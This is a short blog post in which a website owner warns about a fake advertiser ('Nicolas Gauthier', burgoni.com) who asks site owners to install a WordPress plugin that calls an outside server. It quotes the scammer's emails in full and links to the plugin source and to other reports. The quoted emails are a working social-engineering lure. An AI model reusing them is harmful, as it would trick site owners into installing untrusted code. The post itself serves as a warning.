Skip to main content

Potentially Malicious Fake Advertiser using Wordpress Plugin (adv.zip)

It starts with an innocuous email:

Hi,

I am sorry I have to write you to e-mail from whois information of the domain. But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site %DOMAIN%
Is it possible to place banner on your site on a fee basis?

Best regards,
Nicolas Gauthier

But it quickly turned strange:

Hi!

Thanks for reply to our proposal!
We like your price.We would like to place 160x600 banner.

To pass to the banner control system follow the link http://webmaster.burgoni.com
To enter use the following data:

login: %DOMAIN%
password: %PASSWORD%

You should install and activate the plugin in order to display advertisement. Before making payment, advertiser must approve location of the banner. The banner will be shown on your site when you add special code to your web- address (for example: http://%DOMAIN%/?adv_test=1). It means, that visitors will see the banner only if it is approved and payment made.

To get installation instruction for your site type pass to: http://docs.burgoni.com/wp_install
To activate your site you have to enter the code: XUT-XUW-7FN

What way of payment is suitable for you?

Best regards,
Nicolas Gauthier.
site: www.burgoni.com
e-mail: ngauthier@burgoni.com
phone: + (0)9 78 62 74 41

I've sold advertising before but I have NEVER installed a plugin. Warning bells go off. I look at the code and it's definitely calling their server but I couldn't find anything explicitly malicious. However, in other stories it's definitely been confirmed they ARE NOT representing La Coste.

Other stories about this scam:
http://www.sleeandtopher.com/warning-bloggers-beware-of-blog-banner-ad-s...
http://keepsafeonthenet.co.uk/2011/07/martin-dumont/

Plugin Source Code:

http://pastebin.com/Gpj5BHiS

But I still can't figure out - what are they trying to do, anybody have any ideas?